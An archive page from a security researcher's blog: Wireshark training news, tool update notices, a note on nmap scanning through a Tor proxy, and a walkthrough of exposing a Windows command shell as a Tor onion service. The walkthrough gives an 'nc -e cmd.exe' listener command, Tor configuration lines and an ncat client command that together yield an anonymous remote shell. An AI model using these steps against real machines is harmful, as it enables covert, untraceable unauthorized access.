Didier Stevens

Tuesday 27 February 2018

Wireshark Comments

Filed under: Networking,Wireshark — Didier Stevens @ 0:00

For NVISO, I’m providing Wireshark training at BruCON Spring 2018: Wireshark and Lua Programming.

In the following video, I show how to add comments to packets and capture files in Wireshark:

Monday 26 February 2018

Quickpost: Using nmap With Tallow (Tor proxy)

Filed under: Networking,Quickpost — Didier Stevens @ 0:00

Here’s how I used nmap with Tallow on Windows, a transparent Tor proxy:

ICMP is not supported by the Tor network (hence -Pn) neither SYN scanning (hence TCP scanning -sT).

Flag “Force web-only” blocks all ports except 80 and 443, hence why port 22 is filtered.

 


Quickpost info


Tuesday 20 February 2018

Update: pecheck.py Version 0.7.2

Filed under: My Software,Update — Didier Stevens @ 0:00

This is a bug fix version.

pecheck-v0_7_2.zip (https)
MD5: 2A501CD2D15E1108B909B7FCEDFBDA13
SHA256: 9CACA5A41A84049FE6B0D5807A31B7FC5B1A5AC71B3FD3BE4EAC71A96BBDFB3E

Monday 19 February 2018

Update: oledump.py Version 0.0.33

Filed under: My Software,Update — Didier Stevens @ 0:00

This new version of oledump can output the content of all streams in JSON format, and has a new plugin for MSI files: plugin_msi.py.

oledump_V0_0_33.zip (https)
MD5: E5F879766B5C1C899E75E2F2A8ED9533
SHA256: 2B7C9565880F14E8A431F7819926EE801DE129458E682FAAF99FEF41AFA49934

Sunday 18 February 2018

Update: translate.py Version 2.5.3

Filed under: My Software,Update — Didier Stevens @ 0:00

I had to be sure that every 4th byte in a file was identical:

After some thinking, I thought I could use my translate program to select every 4th byte (position % 4 == 3) and then calculate byte statistics. But actually, translate.py can use a (complex) Python expression/program to translate each byte of a file, but it can not be used to select particular bytes. So I made a small change: if the Python expression used with translate.py returns value None (in stead of a numeric value), then the result is not send to output. This way, input bytes can be dropped/deleted.

translate_v2_5_3.zip (https)
MD5: F3C01FCA74A84F1712BAF187E9FE479F
SHA256: 4CA311456EDE5A43097D4E567F225CFF2A68D47B96A261FC935F2A0F1CD4EB0F

Monday 12 February 2018

Update: pdfid.py Version 0.2.4

Filed under: My Software,Update — Didier Stevens @ 0:00

This is a bug fix version for  bugs reported by different users, more details in history.

pdfid_v0_2_4.zip (https)
MD5: 36D5554BC881E7E21382ADA1305ED6F4
SHA256: C1DA287C9C06E3158F79CECF9C2E9A7773FC57FC92021F17B79DDD4B1E5DBB2A

Sunday 11 February 2018

Update: jpegdump.py Version 0.0.4

Filed under: My Software,Update — Didier Stevens @ 0:00

This new version of jpegdump adds option -e: extract jpeg images to disk.

jpegdump_V0_0_4.zip (https)
MD5: 496B6F2B0C0EEF919F7C6E20B9C1ADF6
SHA256: 5D150AE050610B6DB11FBE8B44E385A80800971AF1810F67531BB17A1373C770

Saturday 10 February 2018

Update: hash.py Version 0.0.2

Filed under: My Software,Update — Didier Stevens @ 0:00

This new version of hash.py can recurse into directories by using new option –recursedir.

hash_V0_0_2.zip (https)
MD5: 7C9EF6D52793D6FFAAF4EB6FCEB934B4
SHA256: F768BCBE035ADF099C2AFA41CADB2ABD9514D54E6D361AF5610277B8A70D6B7D

Tuesday 6 February 2018

Update: python-per-line version 0.0.3

Filed under: My Software,Update — Didier Stevens @ 0:00

This new version of python-per-line adds option -i to ignore errors when evaluating the provided Python expression.

python-per-line_V0_0_3.zip (https)
MD5: 40B787E184EBAAD91A9104BF1BF1BF1A
SHA256: 1D7CAE95B5EA169286E4B1528D834D814A474A86240B9975385968B2BADF59AB

Monday 5 February 2018

Quickpost: Remote Shell On Windows Via Tor Onion Service

Filed under: Networking,Quickpost — Didier Stevens @ 0:00

Creating a Tor onion service (aka hidden service) on a Windows Tor client.

I download the Tor expert bundle (this works with the Tor Browser too).

I create Tor configuration file torrc with these lines:

HiddenServiceDir C:\demo\Tor\service
HiddenServicePort 8662 127.0.0.1:12345

When Tor is started, folder C:\demo\Tor\Service will be created and populated with a couple of files (file hostname contains the .onion address created by Tor for this onion service).

The onion service will be listening on port 8662, and traffic will be forwarded to 127.0.0.1 port 12345.

It is possible to enable client authorization for this service (without client authorization, everybody who knows the .onion address and the port can connect to it). Basic client authorization uses a shared secret, and is configured with this line (torrc):

HiddenServiceAuthorizeClient basic testuser

I choose testuser as name for the client.

I start Tor with configuration file torrc like this: tor.exe -f torrc

The .onion address and client authorization cookie can be found in file hostname in the service folder:

nybjuivgocveiyeq.onion Wa5kOshPqZF4tFynr4ug1g # client: testuser

Keep the authorization cookie secret of course, I show it here for the demo.

Now start the service on the target Windows machine with nc.exe (I downloaded nc.exe years ago, I don’t have the original URL anymore, my version is 1.11 with MD5 ab41b1e2db77cebd9e2779110ee3915d):

nc -e cmd.exe -L -s 127.0.0.1 -p 12345

Tor expert bundle and nc.exe have no extra dependencies (like DLLs), and can be executed as normal user.

Now the target machine is ready.

On another machine, I start Tor with a configuration file containing the authorization cookie:

HidServAuth nybjuivgocveiyeq.onion Wa5kOshPqZF4tFynr4ug1g

And then I run ncat, because ncat.exe supports socks5 proxies (nc.exe doesn’t):

ncat.exe --proxy 127.0.0.1:9050 --proxy-type socks5 nybjuivgocveiyeq.onion 8662

This gives me a remote shell:

Remark that this does not work with version 7.60, apparently because of a regression bug:

libnsock select_loop(): nsock_loop error 10038: An operation was attempted on something that is not a socket.

 


Quickpost info


Next Page »

Blog at WordPress.com.